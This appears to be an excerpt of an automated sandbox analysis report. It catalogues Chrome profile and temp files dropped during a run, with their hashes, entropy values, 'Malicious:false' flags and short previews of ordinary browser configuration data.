                                                                                                                                                            Size (bytes):19793
                                                                                                                                                            Entropy (8bit):5.5645935890080995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:X7UtZLlDpXb1kXqKf/pUZNCgVLH2HfDmrUqHGXtmmpD14w:wLlRb1kXqKf/pUZNCgVLH2HfirU6GdmE
                                                                                                                                                            MD5:D467A835189BE9588A894366C2AFB80B
                                                                                                                                                            SHA1:F485973BA2A8860BF295BDEA66308A67F5C6A188
                                                                                                                                                            SHA-256:4BDBBF953549E0C24E8D0E1EDDF15C08F7E315ED8B0761681F1FDA3E1ABAC26B
                                                                                                                                                            SHA-512:4FD9E5C5BF1ADB4D04A0F36FE6AC9DBFA4588424770C5C5AF61CBB3F60B74E26579618246E7678F7DCC9E965488853341467E453E2DB58444D4B5FDA01F254C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13299837697099911","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\aa2a6dcc-3fa3-4e80-a254-548b6fd6707c.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1880
                                                                                                                                                            Entropy (8bit):4.898839456786285
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YALtqNTntwCXGDH3qyvz5sTFGsIRLsMkr4dsPtwR:yNTnOCXGDHa+zWeUrFc
                                                                                                                                                            MD5:14D3379CC8D22C72CF80F29199C1AC8A
                                                                                                                                                            SHA1:5014F5A79759BCB1C47FAC5782CD29224A2E9A2A
                                                                                                                                                            SHA-256:3763A8F37E94D16C6641EAFA33B2166B146AA330DAC3D49B4D2DCAE8167AEA4B
                                                                                                                                                            SHA-512:9E5103397D3D1A1660BF21F16048F52DEA1EAF4DEB5B01FD720533237FA51541FE82E2A6C5866101E9FB2F9D4C508FCFE89B9FA2E12FCFCDD49A549986244092
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"broken_until":"1655364412","host":"clients2.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"exp

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                            MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                            SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                            SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                            SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000004.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):16
                                                                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:1sjgWIV//Rv:1qIFJ
                                                                                                                                                            MD5:6752A1D65B201C13B62EA44016EB221F
                                                                                                                                                            SHA1:58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
                                                                                                                                                            SHA-256:0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
                                                                                                                                                            SHA-512:9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MANIFEST-000004.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\df93528a-7e79-4f8f-833e-9c31b4fdae72.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):19792
                                                                                                                                                            Entropy (8bit):5.564734443993858
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:X7UtZLlDpXb1kXqKf/pUZNCgVLH2HfDmrUqHGItmmpT141:wLlRb1kXqKf/pUZNCgVLH2HfirU6Gqmt
                                                                                                                                                            MD5:C57BD530B82395754FF2119CE2ACD888
                                                                                                                                                            SHA1:8D7BEF83D4CD421FEBB8950D7BFC2F3E989ED333
                                                                                                                                                            SHA-256:CCF3E8E5FC69CBF6A6CB6FA25560F4349D7CF4A1E3B61C62966CD1A224FD9964
                                                                                                                                                            SHA-512:6BD8895DC248891B3899C2219B3A6C85B7F3FAC1A1AD3D2745AFEF9B748CAF07018129A94E99932604DE77C6D5F7966D7FA1D2F01CCC7A13E85C0B47ECD87BA2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13299837697099911","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):106
                                                                                                                                                            Entropy (8bit):3.138546519832722
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
                                                                                                                                                            MD5:DE9EF0C5BCC012A3A1131988DEE272D8
                                                                                                                                                            SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
                                                                                                                                                            SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
                                                                                                                                                            SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13
                                                                                                                                                            Entropy (8bit):2.8150724101159437
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Yx7:4
                                                                                                                                                            MD5:C422F72BA41F662A919ED0B70E5C3289
                                                                                                                                                            SHA1:AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
                                                                                                                                                            SHA-256:02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
                                                                                                                                                            SHA-512:86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:85.0.4183.121

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205353
                                                                                                                                                            Entropy (8bit):6.0442860444670865
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:NlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:rCXkTtMvEJDoV
                                                                                                                                                            MD5:F0BA9FFF655681C4408BB27646D7AF29
                                                                                                                                                            SHA1:8B93F518E57727C6A3A0D4970FE09AE2032AE4D6
                                                                                                                                                            SHA-256:FE7578861ECF0B3B6AF775600EC532A19C1F99CA24889E32325C0A08965A7240
                                                                                                                                                            SHA-512:AA114A0804D3D6A7B05BA8378DAFFD93978CB08C4C21A7894307565C143CDA008B1DF5D8B35CE29EE63A41A46FCDA3B80DB817B7379215473543A6877BE3B213
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):101472
                                                                                                                                                            Entropy (8bit):3.750098022464216
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:evmtZnQe0ZrkRQNRrqv1Hi3exL6HbyGSFrAklqER2xdj1DT3bGr01rmkwSgfBBZY:CW0NGAMmUe+idsTo/jS/K5vFF1
                                                                                                                                                            MD5:D949E8C6332CF098F020D5663EDEFAE3
                                                                                                                                                            SHA1:3C8887F9CCBAFFDB0E1EF6F30A4015F9832382F2
                                                                                                                                                            SHA-256:E53D2FC3C478348C3EB9AFF0862E9BC5AAC39C5A0963D3A034148B972777EB94
                                                                                                                                                            SHA-512:F8D0588C6F89372CBCCB0C985CBDA0A97A7AC696C66F4B39A51B51A91997712CF308A554B2E4DBEE347A47E890062D55CC42EB2A59C795BC70AFCED59FA80EE8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:\...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...?_8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir2508_1875236186\Ruleset Data

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):150056
                                                                                                                                                            Entropy (8bit):4.8588214550289095
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:P8C4uHgjBz+BZKEZZ3F0Sl03PzpDL7UI09QEwNyfe:P8C5go1U6IYeH
                                                                                                                                                            MD5:C56FF16BF9B9FC0002C0128DD0BD763D
                                                                                                                                                            SHA1:5048CFDBAC5D7AAAD345BAE08E66E8C4E803CA02
                                                                                                                                                            SHA-256:404AA48D274C3A8FEC3145858E00279D01E0C37A5304218E191C0156E4DE00FF
                                                                                                                                                            SHA-512:D993A324F5D9A1FC4FB3131252F48679750081D996295C994E2DCA4E84F2DECF7E90AF6766EFEDC2CEFC6B66194FFF38181C9E9CE45346BEEB8B3A09CE66BB73
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.........................[.................................. ...X...l...h...d...0.......X...T...P...L...H.......@...<.......4...0...,.......|...`...D........... ................................'......ozama........*...'......g.bat........&...'......onwod.......`....'......ennab............'......nozam............(......geips.......P...((......rekoj...........@(......lgoog...........X(......uotpo........+..p(......lreko.......d...h(...............Y...............Y...Y..pY..TY..8Y...Y...Y...Y...Y...Y...Y...X...Y...Y...Y...Y...Y...X..|Y..xY...X..pY..xX..hY..XX..`Y..\Y..4X..TY..PY..LY..HY..DY..@Y...X..8Y...W..0Y...W..(Y...W.. Y...Y...Y...Y...Y...Y...Y...Y...Y...X...X...X...X..PW..4W...X...X...X...X...W...X...X...X...X...V...X...V...V...X...X...X..xV...X...X...X...X...X...X...X...X...X..|X..4V..tX..pX..lX..hX..dX...V...U..XX...U..PX..LX...U..DX..@X..<X..8X..xU..\U..@U..(X..$X.. X...X...X...X...U...X...X...X...X...T...T...T...T...W...W...W...W...W...W...W...W...W..LT...W...W...W...W.. T...W..

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\dc5328c0-6267-4ee7-836e-0f1633cc64bb.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):205267
                                                                                                                                                            Entropy (8bit):6.044139801138114
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:PlZIgW3kM8tA5RB5xlEJkaqfIlUOoSiuR+:NCXkTtMvEJDoV
                                                                                                                                                            MD5:36D2BF73B0D55F5FF33D3891174EC645
                                                                                                                                                            SHA1:E04089DBF9F7F82CEE8DF0C5F4A3CDCB8AFAC8A1
                                                                                                                                                            SHA-256:DEE9989055ABE5900F0F72CC3D2E123B119106F263F1EA0DA113571FA174565A
                                                                                                                                                            SHA-512:A8432FEA0D2078A7E75EA0A39C23FEFE40D8834E37207D668C7C5A83CC9B9D05E3C68CD9099B0A432E451F564B8E9F95E2FE29B4EE2AB1176A9032C15E76726C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.655364099525118e+12,"network":1.6553317e+12,"ticks":115516426.0,"uncertainty":4440940.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291230639881056"},"plugins":{"metadata":{"adobe-flash-player":{"displa

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\ec71354c-585c-4a2a-934f-3d788fa3d6aa.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):101472
                                                                                                                                                            Entropy (8bit):3.750098022464216
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:evmtZnQe0ZrkRQNRrqv1Hi3exL6HbyGSFrAklqER2xdj1DT3bGr01rmkwSgfBBZY:CW0NGAMmUe+idsTo/jS/K5vFF1
                                                                                                                                                            MD5:D949E8C6332CF098F020D5663EDEFAE3
                                                                                                                                                            SHA1:3C8887F9CCBAFFDB0E1EF6F30A4015F9832382F2
                                                                                                                                                            SHA-256:E53D2FC3C478348C3EB9AFF0862E9BC5AAC39C5A0963D3A034148B972777EB94
                                                                                                                                                            SHA-512:F8D0588C6F89372CBCCB0C985CBDA0A97A7AC696C66F4B39A51B51A91997712CF308A554B2E4DBEE347A47E890062D55CC42EB2A59C795BC70AFCED59FA80EE8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:\...............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...?_8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1309084964\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1425
                                                                                                                                                            Entropy (8bit):6.006853257458947
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:pZRj/flTm6MhvtGpqYiyfdpFpNizkaoXCope0vtjXD/heMF8fgqoXx8VaO95eumN:p/h4FI1Hfdp/NikakCo4AtjXr59qkOa9
                                                                                                                                                            MD5:EC8699952FD7EF71EBE8F45CADF2046D
                                                                                                                                                            SHA1:E7246D7B5AE48C892ED24B6D3F81FDD66B638604
                                                                                                                                                            SHA-256:1C81D43DB200F4ED1ACEF95A4ED69D99ED2973B466DA5A4BFED724926B756027
                                                                                                                                                            SHA-512:1571DB91CDF87671760B06B1EF0EE7B79EA879F8AD71C14A526230264801ADABFE5E4EB2DA17F054DF3BCCA1622EE8BC8241A5B3C1EE40AD93EDDD9591C958DF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJkb3dubG9hZF9maWxlX3R5cGVzLnBiIiwicm9vdF9oYXNoIjoiekd1OFNyWE56YWp3ZGhCSmtpZXZZWmRqTXA0Y3lnSElZMVRGQjZ3Q3BaQSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJtcTVMa213UHJhelRNX3ZHQU5wQlFJQTFKdHM2c3FrT3YtYzAzbVdWSm1nIn1dLCJmb3JtYXQiOiJ0cmVlaGFzaCIsImhhc2hfYmxvY2tfc2l6ZSI6NDA5Nn1dLCJpdGVtX2lkIjoia2hhb2llYm5ka29qbG1wcGVlbWpoYnBiYW5kaWxqcGUiLCJpdGVtX3ZlcnNpb24iOiI1MSIsInByb3RvY29sX3ZlcnNpb24iOjF9","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"0mlVKh0U_5rfXH2M8gr-QNee1za-5wIRHW8zk5NyBFDHbhqSzhhokA6hAr2wWF4YYIvQVzbFyxI8YTzyiq5eREFDRi13P3xlqx2XCkoBzRnuhu1wnjFw7noyyJsu4VkkzMyvsKxp8pXM_xn4YMoYKKVGsXoCdl4rqzmhHk7DDPQWXYO07v8Ygi1zEyKr6NNaElLbxyHQqKO6uTQdxPZ4brHY1-tCSHV6NmweLbs4dxjWzr60tISaUhESrbSwE4encq5THrEXi900aSwHl-0CqsD6lpZP4BIDnIqp_9b4S-fA1PLwsXRhY3YYD4DKerYS7cZE_yHK0Bh-3-3_ouTAfw"},

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1309084964\download_file_types.pb

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7716
                                                                                                                                                            Entropy (8bit):5.129588744479821
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:f0aEW8SsWk/pvtHB3Nf5Y10k6QKEa4pmigb1BPxzOaRsO6v:f0aEW8SsWk/pvtHB3Nf5YKk6QKEa4pmA
                                                                                                                                                            MD5:6AE4B0CE9611B6BDF5CB5F2804ABC86F
                                                                                                                                                            SHA1:38A7038DE1279146680299FD10C8D7D2CFE9D898
                                                                                                                                                            SHA-256:DDCFA9305103E37BAE828EE2EBFDF6666A34B10734B34C9BA4EE98A41BD71A33
                                                                                                                                                            SHA-512:554E303609759AE8F370AB3703F100EB0DE3C3DBA736A370C7DFC3FEEA5CC7A08A23C6D29A13E84C75E5610EB972B47303B87D6646CDF45D837AB3E840FD902A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.3...#<....jpg... .*.........jpeg... .*.........mp3... .*.........mp4... .*.........png... .*.........csv... .*.........ica... .*.........gif... .*.........txt... .*.........package... .*.........tif... .*.........webp... .*.........mkv... .*.........wav... .*.........mov... .*.........avif... .*.........swf.D .*.........spl.E .*.........crx.. .*.........001..... .*.........7z.4.. .*.........ace..... .*.........arc..... .*.........arj.:.. .*.........b64..... .*.........balz..... .*.........bhx..... .*.........bin..... .*.....0.....bz..... .*.........bz2.8.. .*.........bzip2..... .*.........cab.... .*.........cpio.@.. .*.........fat..... .*.........gz.6.. .*.........gzip..... .*.........hfs..... .*.........hqx..... .*.........iso..... .*.....0.....lha.<.. .*.........lpaq1..... .*.........lpaq5..... .*.........lpaq8..... .*.........lzh.;.. .*.........lzma.?.. .*.........mim..... .*.........ntfs..... .*.........paq8f..... .*.........paq8jd..... .*.........paq8l..... .*.........paq8o.....

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1309084964\manifest.fingerprint

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):66
                                                                                                                                                            Entropy (8bit):3.8964453558303034
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:SVYSQc3xbaSEFHEGUQ3DdBn:SfQqUHvU4dB
                                                                                                                                                            MD5:630815B3559AC244B058F338494FAC16
                                                                                                                                                            SHA1:41272BAF131EC1B8B94039D28D1D5173F6E8AFE4
                                                                                                                                                            SHA-256:E21B642897B112D835FE4A04EFEA15F198A1C4ADD4B921AC098DAB191D669284
                                                                                                                                                            SHA-512:3C9548E8C2769880A15F620EE52330096AB576A2F439CF7C2A29CCD2394BD6A737F962F8F96627F0FF94C740B92D65F5A92DC886F5B12512BF075169D096584F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:1.0835331e67dfbac434441ed07a3afbbea7671820ce2c0dbc1f351fd20c3f8a05

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2508_1309084964\manifest.json

                                                                                                                                                            Download File
